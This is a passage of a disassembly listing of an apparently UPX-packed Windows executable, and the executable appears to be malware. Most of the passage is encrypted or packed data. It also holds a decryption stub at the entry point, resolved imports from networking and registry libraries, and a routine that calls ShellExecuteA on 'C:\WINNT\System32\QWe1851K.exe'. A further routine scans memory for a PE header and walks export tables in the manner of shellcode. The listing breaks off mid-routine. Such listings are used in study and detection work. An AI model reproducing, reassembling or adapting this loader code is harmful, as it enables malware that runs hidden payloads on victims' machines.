dd 0A3152199h, 0D954A1CDh, 0CC54A159h, 9EC1AE97h, 37E41041h
dd 40A0B3A3h, 0E25B814Ch, 0A7AB4B09h, 99CB3026h, 44895175h
dd 9A47F254h, 0A9342FC9h, 38DD7B08h, 4AFEC131h, 4DC63631h
dd 8A8E8B41h, 0E27837h, 44C95098h, 7605078Ch, 8BEDEF42h
dd 90F41E6Fh, 0C91942C1h, 5004A7BDh, 9A6A9444h, 0ABEB5F9Bh
dd 4C6C2189h, 71B474AFh
dd 9D9D9F4Ah, 0A77C36DFh, 0D136896Fh, 0E0AB436Fh, 9D93D3E8h
dd 34F80D42h, 993C8F6Bh, 0FE754D9Bh, 0C3AD5C74h, 180AAE99h
dd 4490C6F6h, 0F7791C4Ch, 30CCA3BBh, 0EAC737BFh, 0A46446BAh
dd 8BA52176h, 0AFA72E9Dh, 0BF436BA9h, 673B1679h, 17368E0Fh
dd 0E7FAF8BCh, 0D549A0FBh, 51AFAFC0h, 0BDAF95E7h, 0ADB9BCB9h
dd 0ACB1ACE7h, 0A6AF99C9h, 0A50BEE0Fh, 0A2B9ACACh, 0ACA7BBACh
dd 89FBFAA5h, 0FAA96497h, 0CF75E409h, 7AAFC7ADh, 0FC99367Ah
dd 0E7D1C0C3h, 0D333CDC0h, 0C2219D99h, 6549EF60h, 92ABE0D3h
dd 0C58C4401h, 7AC1225Ah, 82BE9821h, 0AFAFBDAFh, 0D08542F5h
dd 0FA02CAB1h, 7ADD443Fh, 42E998CAh, 171ACADBh, 0FBCE0908h
dd 0F3498BCBh, 3FAFAE8Fh, 0F23CBC70h, 0BDD5ED8Dh, 0B8F28FCEh
dd 514BBD1h, 4FED9842h, 0BBDD7EC6h, 0AFB6D5D4h, 0CAD58842h
dd 59CD420Ah, 0A8400ACAh, 0E77585C9h, 19AF8DE7h, 0AEAD2F36h
dd 0AF9D742h, 0D552C592h, 0C154D242h, 0F8CBA30Ah, 9FA79B3Dh
dd 3AFD50Dh, 0DF22121Dh, 4824180Dh, 0AED59803h, 52503256h
dd 0AFAFA1FDh, 1E701300h, 1F070415h, 701B02h, 2171F02h
dd 61701D11h, 0AFAB479Dh, 111CA6E1h, 5A521D1Eh, 343E3907h
dd 7023273Fh, 70223F36h, 7D865307h, 373B2F3Dh, 20253F22h
dd 314A635Eh, 0E731D77h, 62B93C6Eh, 62627108h, 1E617E62h
dd 56A97004h, 70488A3Bh, 0F420626Ch, 0EB23DBh, 5A57497Bh
dd 173AF5Ch, 502DD333h, 445A4154h, 0EB845570h, 9AEB0BB8h
dd 1B1C5039h, 50000303h, 0ABD2C706h, 58994E8Fh, 745007B0h
dd 5034503Eh, 5027503Fh, 0A6A66A23h, 6024CB32h, 69DC5951h
dd 53736550h, 4D14E6B6h, 8A50577Eh, 341E2951h, 8A7058FBh
dd 0C234CAD7h, 7653CF07h, 3DD33098h, 17731651h, 23AF1057h
dd 50565F73h, 4F514056h, 0B0D8DA45h, 0AF305018h, 501FB5AFh
dd 3A49D114h, 19B4A22Ah, 60FF784Ch, 37402475h, 711FB103h
dd 8F0C148Fh, 54506025h, 7DFE3BFFh, 0AED570Ch, 0DD310C58h
dd 1D258CDDh, 5066577Eh, 60277E68h, 8B2BFF31h, 0BC50194Bh
dd 6B745013h, 7D33506Fh, 349F704Fh, 548C58F2h, 0B44E9210h
dd 50AF46EFh, 5E508E8Eh, 51CF4650h, 67BF7652h, 78101231h
dd 0DB415349h, 0E8388E9Bh, 8324893Ch, 7A335020h, 0EE12C68Bh
dd 0CF753BCCh, 25185E40h, 546DD18Dh, 443044Bh, 0ABCF760Ah
dd 933868Ch, 9B970C72h, 55D73515h, 0A3186B05h, 40535B50h
dd 5140E818h, 64CFAFABh, 783A5155h, 0E15C6949h, 0F8CB4180h
dd 891F9050h, 350FA57Eh, 0D4FA80Fh, 4CBBDAD8h, 0B8CF4199h
dd 18407B6Ch, 0CF758130h, 0A45CBCDBh, 5CF030F3h, 295F705Ch
dd 5CE15CF0h, 1EAFEE50h, 0D85CF0DEh, 50595010h, 505753BCh
dd 19B14E91h, 1F1044C5h, 0EF10202Ch, 0E2792B72h, 43135750h
dd 6FA0CE29h, 5043D528h, 0B9F60BFBh, 7FA84043h, 52239665h
dd 735EAEAFh, 60918210h, 0D4586608h, 0B4A213D8h, 40E92D83h
dd 0E851AFBEh, 0A2705C40h, 0FD296631h, 5F2F575Dh, 0B5CF7588h
dd 20514845h, 0C0565FD4h, 5FD4295Fh, 52505FC5h, 0ACCE1DD7h
dd 3C5FD42Fh, 98CA505Fh, 0F8D4FA8Eh, 9A43133Fh, 4FDC596Fh
dd 83E39h, 6C220070h, 5090F68Bh, 69511416h, 996C3B62h
dd 426CD41Fh, 11522545h, 2B725003h, 0C44CD45Dh, 0FFAFCB51h
dd 9656BB4Ch, 23750C0Ch, 3320390Ch, 0CFD13674h, 0BCAFA92Fh
dd 0B4AF574Ch, 14350350h, 37253235h, 3C392639h, 11353735h
dd 0E2368B34h, 23253AAFh, 3B3F0424h, 23473E35h, 25423F1Ch
dd 0C22F26ADh, 3C310620h, 47113525h, 3F78201Fh, 7FAE5C33h
dd 642374E6h, 26343113h, 63392031h, 42B2FEB3h, 3524252Fh
dd 43613D22h, 0EB533962h, 35F32F42h, 22040F45h, 69072931h
dd 0BF22134Bh, 358BBD8Ch, 35024E31h, 4553F3Dh, 6445C38h
dd 3E242239h, 25E686BDh, 378110Ch, 25F2815h, 0F163E22h
dd 1B65862Ah, 1872A3A5h, 0D3000404h, 0D9217F8Eh, 0B627010h
dd 5D1B1F70h, 8BAD515Ah, 3F1BADFDh, 7D52143Eh, 2437541Ch
dd 75706A38h, 7931BD25h, 787F48CBh, 0A4E92904h, 763B2DE6h
dd 393C20F7h, 4539D533h, 0F37D287Fh, 9B27BE88h, 3D3F337Dh
dd 359D2220h, 0B8F0734h, 5084AF78h, 50041517h, 41345236h
dd 8D7BADF1h, 3DC52387h, 0E1332623h, 3DF28D87h, 35512735h
dd 0F625F58h, 0AD9C8CB6h, 64612547h, 5557A753h, 0CA393E57h
dd 6162537Eh, 88436960h, 68E3C32Bh, 7356284Fh, 5CCB8C57h
dd 1F606162h, 2F2F2579h, 0EB70C8ABh, 2150305h, 1E581419h
dd 50560819h, 18712B09h, 756AB8F1h, 95F79D34h, 3AFA2A6h
dd 704161Fh, 0C150211h, 233F391Dh, 8D0C933Fh, 0E7D3A086h
dd 2225130Ch, 98065922h, 0E50CAE23h, 293B112h, 2903EC25h
dd 0A202C0ADh, 0B7F1D72Fh, 363407CAh, 3E382331h, 3423342Ah
dd 2686423Ch, 27190343h, 0C076F31h, 5E8830F1h, 2DB693Ch
dd 0E41B5D07h, 53CC7386h, 362170A5h, 0A75ED6BFh, 26703739h
dd 68264BADh, 0CD623526h, 37E9E61Bh, 40037034h, 0E84B3514h
dd 4471E267h, 4B47730Ch, 0CB620C6Fh, 12501CFBh, 0FCC1706Fh
dd 6DCF4A65h, 0E04EEF73h, 5604FD12h, 391467C2h, 3DEBCE23h
dd 36BE26C4h, 0CC3D377Fh, 3C7FA67Ah, 33743399h, 2924395Ah
dd 3E311D70h, 895B94Eh, 61994AE1h, 95CDE4DCh, 2648326h
dd 585E1103h, 0AFAFBFECh, 0F4914BAFh, 8D19CFDEh, 348B4F15h
dd 5DB5E595h, 739BB2FAh, 3333C972h, 2348184Ch, 0BDAFAFAFh
dd 0DCCA93A2h, 9C1DD506h, 83FD5FB1h, 67394556h, 0C8F8ADDDh
dd 9E205B46h, 4415001Fh, 0A867AFAFh, 0BF621A69h, 8817FEB3h
dd 0EAD48FEDh, 23D0674Eh, 5DA5DBD1h, 0C2B02D1Ah, 0B88FAFAFh
dd 0E8957DAEh, 0D5B07096h, 38EDCCh, 0E6793Ah, 129364D2h
dd 0C858412Fh, 0AFAFAFAFh, 0B7E7E24Ch, 27D9CDCCh, 83C74A6Dh
dd 0DD0079F4h, 166AC6F5h, 42B8ACDDh, 0FF40BB46h, 0A8152014h
dd 0AFAFAFBAh, 28C63A80h, 113CFE1h, 0D6F877BBh, 59DA6920h
dd 0F192448Eh, 462A0391h, 0C7D594EFh, 0F08FF328h, 0C879B75Fh
dd 3D9CECEh, 0C45774AEh, 0AFAFAFAFh, 25F3BC9Ah, 0A94DF14Eh
dd 9B95E4B8h, 0A08B4A1Eh, 0D7693987h, 2BC4DC4Ah, 0D2434896h
dd 1BEF6EE3h, 0A07FAFAFh, 0BB37B012h, 30E767E2h, 8788E3FAh
dd 3554D072h, 0AF1BF62Ah, 15D508D6h, 0AC4BAFF6h, 0BEA93EA6h
dd 62C09906h, 0E7F66B1Ah, 0BB83882Ah, 0C7BE1233h, 0A75448D8h
dd 61000FB8h, 0F6CA539Ch, 0C8E4CA39h, 7C6C0828h, 39E29D64h
dd 8C0EA844h, 6483E49Ch, 0C0F4831Dh, 5B3024D0h, 2112B93Dh
dd 0B3D7ECFh, 3C8C5525h, 0F7380B74h, 0E750197Eh, 0C6E65D34h
dd 3B957C7Dh, 314C37FDh, 8B51A03Eh, 7C25D688h, 2A3F7F22h
dd 208B2932h, 1189FCECh, 0F4442232h, 0FD305C29h, 8293C75h
dd 86371A68h, 9A3B16A1h, 237E31E6h, 0D4772528h, 3E976A66h
dd 6D7E4616h, 3DD0E037h, 7F9A16DEh, 554C3C78h, 3764EB2Bh
dd 413F204Ah, 43312A7Eh, 9F4B3693h, 31AE6359h, 104A0F43h
dd 373FDE3Eh, 273B2513h, 370DEDC0h, 4F24880Eh, 4FF53334h
dd 0ACF9BB09h, 7D233F3Ch, 0F77E0831h, 3BFDE270h, 0FB25B30Bh
dd 0EE32463Ch, 0E6EB756Dh, 2236E97Fh, 1A313C36h, 5EBC59AEh
dd 31223763h, 24317E2Ah, 3D5BD1D0h, 2766D73Dh, 2DEB8A7Dh
dd 4EB5FE3Ah, 33329B25h, 0EF373671h, 2F8B5BBAh, 3D3C3B3Ah
dd 21203F3Eh, 27C22402h
db 28h ; (
db 29h, 2Ah, 8Ah
db 8
db 0AEh, 0Fh, 0A9h
db 11h
db 12h, 13h, 14h
db 15h
db 16h, 17h, 18h
db 19h
db 1Ah, 1Bh, 1Eh
db 0ACh ;
db 1, 7, 2Bh
db 0F1h ;
db 8, 10h, 4
db 4Ah ; J
db 8, 9, 0Ah
db 4Bh ; K
db 0E8h, 0FDh, 0A5h
db 2
db 0D1h, 0F0h, 27h
db 68h ; h
db 70h, 7Ah, 0E6h
db 57h ; W
db 0B9h, 10h, 71h
db 52h ; R
db 37h, 0DCh, 0AFh
db 9Bh ;
db 1Bh, 5Ch, 0A6h
db 6
db 9Ah, 13h, 1Bh
; ---------------------------------------------------------------------------
jo short loc_31508081
add [esi+3], dh
lds edi, [esi]
cmpsb
xor al, 5Bh
pop ds
push ds
pop ss
assume ss:UPX0
pop edx
pop ebx
sbb [edi-4], ebp
or eax, 656457AAh
retn 1F1Ah
; ---------------------------------------------------------------------------
dw 7F5Ch
dd 4190501h, 74D13B3Fh, 172B064Ah, 0E6B5A736h, 24734133h
dd 0D44729E5h, 90B0570Fh, 70F2529Bh, 0EE86A378h, 3253B80Dh
db 34h
; ---------------------------------------------------------------------------
loc_31508081: ; CODE XREF: UPX1:3150803C�j
imul esi, [eax+64h], 19h
adc eax, 59456670h ; CODE XREF: UPX1:3150809D�j
push esi
pop ebx
pusha
cld
dec esi
in al, 65h
adc [esi+20h], al
bsf edi, [ecx+50h]
cmp esp, [edi]
and [ebx+31h], edx
jl short near ptr loc_31508085+4
sahf
in eax, 0B6h ; Interrupt Controller #2, 8259A
push edx
sbb eax, 395F570Ch
push ebx
sub al, 42h
pop eax
out 39h, eax
xor eax, 9743617Dh
imul bl
pop eax
ficom dword ptr [ecx+ebx*2-385041F0h]
scasd
push ecx
cmp al, 23h
and al, 22h
xor edi, ds:35171120h
and al, 1Ch
aas
xor esi, [ecx]
cmp al, 35h
sbb [esi], edi
db 36h
aas
pop edi
or esp, [ecx]
push es
les eax, [ebx]
add dl, [ecx+ebx*2]
xor edi, [esi+15h]
out 44h, eax
das
sub [ebp+7], eax
or ds:8DA1716h, esi
shl dword ptr [eax-32h], cl
add al, 39h
retf 0C7EDh
; ---------------------------------------------------------------------------
db 0E9h, 3Dh, 5Eh
db 5Bh ; [
db 4, 3Fh, 70h
db 45h ; E
db 0F0h, 35h, 0BDh
db 5Ch ; \
db 50h, 16h, 11h
db 5Ch ; \
db 0EFh, 12h, 6Ch
db 0A6h ;
db 5Dh, 6Fh, 1Dh
; ---------------------------------------------------------------------------
aas
xor al, 0FCh
jge short loc_3150812F
xor [esi-20h], eax
retn
; ---------------------------------------------------------------------------
db 7Dh, 11h, 0DEh
dd 2E0E1139h, 56A45ABFh, 13598F4Fh, 4E29203Fh, 682BAEB4h
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
cmp [esi], edi
loc_3150812F: ; CODE XREF: UPX1:3150810F�j
adc eax, 0D1013528h
cmpsb
scasd
push esi
mov ebp, 0CA3C3F2Eh
and [ebx+62h], ah
add edi, [esi]
xor [eax], esp
and edi, [eax]
aas
and al, 49h
; ---------------------------------------------------------------------------
db 8Dh ;
db 0FDh, 9Dh, 0F0h
db 83h ;
db 42h, 62h, 22h
db 23h ; #
db 5Fh, 4, 55h
db 23h ; #
db 0FDh, 11h, 96h
db 65h ; e
db 7Ch, 48h, 0A6h
db 56h ; V
db 0ABh, 0D0h, 71h
db 1Eh
db 35h, 28h, 24h
db 38h ; 8
db 20h, 22h, 4
db 3Ch ; <
db 9Bh, 37h, 28h
db 15h
db 26h, 58h, 0AFh
db 31h ; 1
db 16h, 0DBh, 3
db 0E1h ;
db 0E9h, 0E7h, 12h
db 0B4h ;
db 2Bh, 1Fh, 32h
db 3Ah ; :
db 0C9h, 44h, 14h
db 0C6h ;
db 37h, 43h, 5Ah
db 9Fh ;
db 45h, 0E7h, 1Ch
db 31h ; 1
db 15h, 99h, 9Ah
db 0FDh ;
db 45h, 6Ah, 76h
db 7Fh ;
db 15h, 28h, 33h
db 0E2h ;
db 8Bh, 31h, 2Bh
db 4
db 73h, 3Eh, 0Ch
db 56h ; V
db 35h, 20h, 35h
db 0C7h ;
db 7Ch, 59h, 0Fh
db 41h ; A
db 17h, 3Eh, 7Eh
db 42h ; B
db 3Fh, 0F0h, 88h
db 6Fh ; o
db 5Bh, 11h, 34h
db 34h ; 4
db 22h, 5Fh, 44h
db 1Ch
db 39h, 32h, 22h
db 78h ; x
db 5Ch, 0E6h, 0D4h
db 31h ; 1
db 0D9h, 7Bh, 1Dh
db 75h ; u
db 16h, 8Ch, 58h
db 37h ; 7
db 4Fh, 0FBh, 0Fh
db 35h ; 5
db 18h, 5Eh, 40h
db 0C6h ;
db 14h, 0D7h, 0CFh
db 9Bh ;
db 3Ch, 0B1h, 92h
db 3Ch ; <
db 46h, 4Dh, 20h
db 0F2h ;
db 33h, 3Bh, 17h
db 7Dh ; }
db 81h, 31h, 3Dh
db 25h ; %
db 22h, 0B5h, 1Dh
db 8Fh ;
db 28h, 3Ch, 66h
db 0D9h ;
; ---------------------------------------------------------------------------
retn 94A3h
; ---------------------------------------------------------------------------
db 5Dh ; ]
db 3Ah, 0C8h, 15h
db 0C8h ;
db 61h, 49h, 5Eh
db 32h ; 2
db 0D1h, 5Eh, 2Bh
db 13h
db 49h, 0B9h, 61h
db 19h
; ---------------------------------------------------------------------------
retn 8B33h
; ---------------------------------------------------------------------------
db 26h ; &
db 0D3h, 0B4h, 3Bh
db 35h ; 5
db 34h, 5Ah, 33h
db 43h ; C
db 3Dh, 7Dh, 2
db 0Dh
db 28h ; (
db 99h ;
db 20h
db 4Bh ; K
db 6Ah ; j
db 58h ; X
db 15h
db 2Ah ; *
db 35h ; 5
db 76h ; v
db 94h ;
db 43h ; C
db 0D6h, 0Eh, 6Dh
db 50h ; P
db 81h, 38h, 8
db 0F1h ;
db 9Dh, 0BEh, 45h
db 29h ; )
db 20h, 24h, 4Ah
db 0E2h ;
db 94h, 40h, 57h
db 9Dh ;
db 0E6h, 7Fh, 5Ah
db 14h
db 42h, 31h, 5Eh
db 0BCh ;
db 2Bh, 55h, 93h
db 26h ; &
db 39h, 36h, 29h
db 16h
db 37h, 9Ah, 6Ch
db 85h ;
db 46h, 0E0h, 0E7h
db 0F1h ;
db 40h, 0DFh, 7
db 3Fh ; ?
db 29h, 7Ch, 41h
db 3Dh ; =
db 0D6h, 91h, 0EEh
db 1Bh
db 35h, 29h, 40h
db 2
db 0E2h, 4Eh, 35h
db 0A9h ;
db 33h, 0D7h, 47h
db 6Eh ; n
db 0BFh, 44h, 11h
db 33h ; 3
db 21h, 25h, 39h
db 22h ; "
db 46h, 4Ah, 0D7h
db 5Dh ; ]
db 1Dh, 19h, 0DFh
db 0Ch
db 24h, 0E6h, 0E9h
db 9
; ---------------------------------------------------------------------------
cmpsd
push 0FFFFFF91h
aaa
retn 0BF5Dh
; ---------------------------------------------------------------------------
db 11h
db 40h, 5Eh, 6Bh
db 0C4h ;
db 71h, 5Dh, 6Eh
db 5Fh ; _
db 1, 0BCh, 0C0h
db 0E0h ;
db 86h, 5Ah, 65h
db 41h ; A
db 75h, 60h, 0C8h
db 95h ;
db 36h, 54h, 7Dh
db 71h ; q
db 40h, 0CEh, 0B1h
db 0DEh ;
db 15h, 0E5h, 0Fh
db 11h
db 32h, 39h, 0A5h
db 3
db 38h, 1Dh, 93h
db 16h
db 44h, 0DBh, 0FFh
db 3Eh ; >
db 43h, 8Eh, 0A8h
db 8Dh ;
db 0B5h, 27h, 6Bh
db 28h ; (
db 3Fh, 39h, 55h
db 31h ; 1
db 3Eh, 23h, 39h
; ---------------------------------------------------------------------------
loc_315082B4: ; CODE XREF: UPX1:315082E7�j
push esp
xor edi, [edi+3F9BA6E6h]
and ecx, [edi] ; CODE XREF: UPX1:31508322�j
; ---------------------------------------------------------------------------
db 15h, 18h, 0Fh
; ---------------------------------------------------------------------------
and [esp+edx+130F5B37h], cl
sub [eax], ch
push 3C1AC876h
sbb al, 0B7h
sar dword ptr [ebx], 1
retn
; ---------------------------------------------------------------------------
db 0D3h
db 2Dh ; -
; ---------------------------------------------------------------------------
xor bh, [eax]
push edi
and [ecx], ch
adc bh, [edx+6Bh]
jmp short loc_31508324
; ---------------------------------------------------------------------------
retf 9FB2h
; ---------------------------------------------------------------------------
lea ecx, [edi]
cmp [eax+63h], bh
jns short loc_315082B4
imul eax, [edi+2224234Ch], 19565D41h
or ebx, [ecx-1599C2C4h]
loc_315082FA: ; CODE XREF: UPX1:3150835D�j
pop edi
cld
and al, 0E7h
out 89h, al ; DMA page register 74LS612:
; Channel 6 (address bits 17-23)
cmp al, 0C4h
mov ecx, 2327516Ch ; CODE XREF: UPX1:31508367�j
sub al, 0DBh
and al, 36h
dec ecx
sal dh, cl
dec ecx
add cl, [ebx+35h]
imul eax, [esi], 6AF2C138h
aas
inc esp
mov [ebx+61h], bl
xor esp, [esi+4Bh]
jno short loc_3150837D
jns short loc_315082BB
loc_31508324: ; CODE XREF: UPX1:315082DD�j
cmp esi, esp
rol dword ptr [ebx], cl
sbb [edi+ebx], esi
movsb
add [ebx-78h], ch
cmpsb
mov al, 0DAh
mul dword ptr [ebp+5]
and edx, [ecx]
inc ecx
cmp al, 49h
push ecx
or ebx, [esi+1Eh]
inc ecx
dec ebx
not byte ptr [esi+67h]
or eax, 27C33EEBh
add eax, [edi]
test [ebp+20524F2h], edx
xor al, 0F5h
wait
loop near ptr loc_315083D0+1
or eax, [edx+52h]
pop eax
and edx, [edx+5Dh]
push ecx
jl short loc_315082FA
loop loc_315083DD
imul edi, [edi], 0E247645Bh ; CODE XREF: UPX1:3150837B�j
jl short near ptr loc_31508302+2
loop loc_315083C7
loc_3150836B: ; CODE XREF: UPX1:31508379�j
pop ecx
push esp
inc ebx
inc eax
add al, 9Fh
push eax
call far ptr 0A516h:15000746h
jnz short loc_3150836B
jg short near ptr loc_31508361+3
loc_3150837D: ; CODE XREF: UPX1:31508320�j
or eax, 53108377h
lahf
retf 4FBDh
; ---------------------------------------------------------------------------
dw 5F50h
dd 56515B51h, 4342645Ch, 0C8884D48h, 60B5512Bh, 8D5B6165h
dd 5290597Ch, 205C573Bh
; ---------------------------------------------------------------------------
ror ebp, 1
loc_315083A6: ; CODE XREF: UPX1:315083F5�j
jmp near ptr 71B4D220h
; ---------------------------------------------------------------------------
db 57h
dd 0E208B5DAh, 6B385356h
; ---------------------------------------------------------------------------
loc_315083B4: ; CODE XREF: UPX1:315083EC�j
fcom qword ptr [edx+2F925126h]
loc_315083BA: ; CODE XREF: UPX1:31508409�j
xor al, 0E0h
push ecx
dec esi
or [ebx], al
and eax, 53547EEAh
arpl ax, ax
loc_315083C7: ; CODE XREF: UPX1:31508369�j
xchg eax, ecx
pop eax
push esi
db 64h
xchg ax, sp
nop
db 67h
cwde
loc_315083D0: ; CODE XREF: UPX1:31508353�j
mov ebp, 7EB054A4h
xor al, 0C0h
stosd
popf
inc ecx
inc edx
ja short loc_31508437
loc_315083DD: ; CODE XREF: UPX1:3150835F�j
db 3Eh
or [eax], bl
push 30509068h
push eax
sal byte ptr [ecx], 1
or esi, [eax+6Dh]
push ebx
jl short loc_315083B4
push ecx
push eax
push eax
push eax
push eax
push eax
push eax
jo short loc_315083A6
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
xor dh, ch
push eax
xor [eax], al
popa
fucomp st(6)
push eax
loopne loc_315083BA
scasd
pop es
rcr dword ptr [ebp-3FBF4451h], cl
rol al, 0C0h
rol al, 0DAh
push esi
push ss
fcom dword ptr [edi+17h]
push ecx
mov esp, ds:0D34EDB57h
mov esi, 228B41ACh
mov ebp, 505051E8h
push eax
push ecx
mov esp, ds:0D34EDB57h
loc_31508437: ; CODE XREF: UPX1:315083DB�j
mov esi, 418B41ACh
nop
push ecx
mov esp, [ebx]
mov edi, 4EDB5925h
sar dword ptr [esi+238B41ACh], cl
mov ah, 61h
cdq
sar dword ptr [eax-6EA2DDADh], cl
mov al, 58h
ficom dword ptr [esi+16h]
shl dword ptr [eax-26DBDB51h], cl
xchg eax, ebp
push ecx
mov esp, ds:0D34EDB57h
mov esi, 418B41ACh
cdq
push ecx
mov esp, ds:0D34EDB57h
mov esi, 418B41ACh
cdq
and eax, 8B511170h
and eax, 0D34EDB57h
mov esi, 418B41ACh
cdq
push ecx
mov esp, [ebx]
mov edi, 4EDB5925h
sar dword ptr [esi+238B41ACh], cl ; CODE XREF: UPX1:315084DD�j
mov ah, 0D3h
xchg eax, ecx
push edx
shr dword ptr [ebp-50505CB0h], 1 ; CODE XREF: UPX1:315084F6�j
rol dword ptr [ecx+7F44DD51h], cl
shr dword ptr [ebp-25A0D954h], cl
push edx
adc bl, al
push edi
pop ss
assume ss:nothing
sbb ds:0AF33B9A7h, esp
scasd
scasd
rcr bl, 52h
rcl dword ptr [edx-2CA826ACh], cl
xchg eax, edi
push esp
sar dword ptr [ecx+51A12754h], cl
lahf
mov ecx, 0AFAFAF1Ch
push cs
fldenv byte ptr [edi+50509AE9h]
push eax
ficom dword ptr [edi+17h]
jl short near ptr loc_31508492+5
insb
push ecx
daa
cmpsd
shr byte ptr [edi+51h], 1
and eax, 0DA57DBA2h
andps xmm6, oword ptr [esi]
xchg eax, ecx
mov eax, 40909158h
setalc
xchg eax, esp
jns short near ptr loc_3150849C+4
sar byte ptr [ebx-265FAE48h], 1
push edi
rcl dword ptr [edi-4D7726ABh], cl
mov ebp, ebx
out dx, al
push eax
xor [eax+50h], dl
fist dword ptr [edi+59h]
nop
and al, 15h
fisttp dword ptr [edi]
push esp
fst st(4)
pusha
push eax
rcl byte ptr [eax+50h], 1
push ecx
mov ds:5897D300h, eax
scasd
mov ah, 0D0h
push eax
push eax
; ---------------------------------------------------------------------------
db 0C5h ;
db 0DAh, 57h, 17h
db 58h ; X
align 2
dw 8C24h
db 0D9h ;
db 0A9h, 29h, 57h
db 5Fh ; _
db 0E7h, 57h, 17h
db 0
db 17h, 0E9h, 7
db 18h
db 0A2h, 0FEh, 5
aPPpyrWSUtIpPp1 db 'PPY$WSӓTPP1ǯPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP'
db 'PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP'
db 'PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP',0
align 1000h
UPX1 ends
; Section 3. (virtual address 00009000)
; Virtual size : 0000B000 ( 45056.)
; Section size in file : 0000B000 ( 45056.)
; Offset to raw data for section: 00009000
; Flags E00000E0: Text Data Bss Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31509000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 90C4h, 908Ch, 3 dup(0)
dd 90D1h, 909Ch, 3 dup(0)
dd 90DEh, 90A4h, 3 dup(0)
dd 90E9h, 90ACh, 3 dup(0)
dd 90F4h, 90B4h, 3 dup(0)
dd 9100h, 90BCh, 5 dup(0)
dd 77E805D8h, 77E7A5FDh, 77E75CB5h, 0
dd 77DD189Ah, 0
dd 77C48D44h, 0
dd 77D4C96Ah, 0
dd 7620AFB6h, 0
dd 71AB1A6Dh, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 69730000h
dd 6Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
dword_31509200 dd 59E85Bh, 648B0000h, 0EBB80824h, 0EB000004h, 0A16764FAh
; DATA XREF: UPX2:315092FE�o
dd 408B0018h, 40B60F30h, 0F88302h, 0E83C75h, 5D000000h
dd 2320ED81h, 858B0040h, 402367h, 236F8503h, 0F08B0040h
dd 236B858Bh, 85030040h, 40236Fh, 33FE8B50h, 8532ACC9h
dd 402377h, 8D3B41AAh, 402373h, 2BC3EF7Ch, 30FF64C0h, 0B8208964h
dd 12345678h, 60000387h, 84000000h, 0
db 50h ; P
db 31h, 0, 26h
db 0
align 2
dw 0E850h
db 4Fh ; O
align 4
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 33h, 32h, 2Eh
db 64h ; d
db 2 dup(6Ch), 0
aShellexecutea db 'ShellExecuteA',0
aCWinntSystem32 db 'C:\WINNT\System32\QWe1851K.exe',0
; ---------------------------------------------------------------------------
inc esi
inc edi
dec eax
dec ecx
dec edx
dec ebx
dec esp
dec ebp
dec esi
dec edi
push eax
push ecx
push edx
push ebx
push esp
push ebp
push esi
push edi
pop eax
pop ecx
pop edx
add [edx+52h], bl
push edx
mov ebx, 77E7D961h
call ebx
pop ebx
push ebx
add ebx, 0Ch
push ebx
push eax
mov ecx, 77E7B332h
call ecx
pop edx
push 1
push 0
push 0
mov ecx, edx
add ecx, 1Ah
push ecx
push 0
push 0
call eax
mov eax, offset dword_31509200
jmp eax
; ---------------------------------------------------------------------------
align 4
dd 7DDh dup(0)
db 2 dup(0), 21h
; =============== S U B R O U T I N E =======================================
public start
start proc near
var_8 = dword ptr -8
pusha
sub edx, edx
sub ecx, ecx
mov cl, 0B3h
loc_3150B286: ; CODE XREF: start+8�j
inc edx
loop loc_3150B286
call $+5
pop ecx
add ecx, 25h
mov esi, 243Ch
push ecx
loc_3150B29B: ; CODE XREF: start+2A�j
xchg al, [ecx]
sub ax, dx
mov [ecx], al
add ecx, 1
dec esi
cmp esi, 0
jnz short loc_3150B29B
pop ecx
mov [esp+20h+var_8], ecx
popa
jmp ecx
start endp
; ---------------------------------------------------------------------------
align 4
call $+5
mov eax, [esp]
test dword ptr [eax+242Bh], 80000000h
mov [eax+29ACh], ebx
mov ebx, [esp+4]
jz short loc_3150B2FF
cld
pop ecx
mov [eax+29B0h], esi
mov [eax+29B4h], edi
cmp byte ptr [eax+242Fh], 0E8h
jnz short loc_3150B2F6
add ebx, [eax+2430h]
mov ebx, [ebx+2]
push dword ptr [ebx]
jmp short loc_3150B2FE
; ---------------------------------------------------------------------------
loc_3150B2F6: ; CODE XREF: UPX2:3150B2E7�j
mov ebx, [eax+2431h]
push dword ptr [ebx]
loc_3150B2FE: ; CODE XREF: UPX2:3150B2F4�j
pop ebx
loc_3150B2FF: ; CODE XREF: UPX2:3150B2D0�j
push ebp
xchg eax, ebp
sub dword ptr [esp+4], 203Ah
and ebx, 0FFFFF000h
sub ebp, 401006h
mov edi, [esp+4]
lea esi, [ebp+40343Ch]
mov ecx, 0
rep movsb
loc_3150B326: ; CODE XREF: UPX2:3150B342�j
cmp dword ptr [ebx+4Eh], 73696854h
jnz short loc_3150B33C
mov eax, [ebx+3Ch]
lea eax, [eax+ebx]
cmp word ptr [eax], 4550h
jz short loc_3150B344
loc_3150B33C: ; CODE XREF: UPX2:3150B32D�j
sub ebx, 100h
jnz short loc_3150B326
loc_3150B344: ; CODE XREF: UPX2:3150B33A�j
mov edx, [eax+78h]
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_3150B352: ; CODE XREF: UPX2:loc_3150B379�j
lodsd
add eax, ebx
cmp dword ptr [eax-1], 74654700h
jnz short loc_3150B379
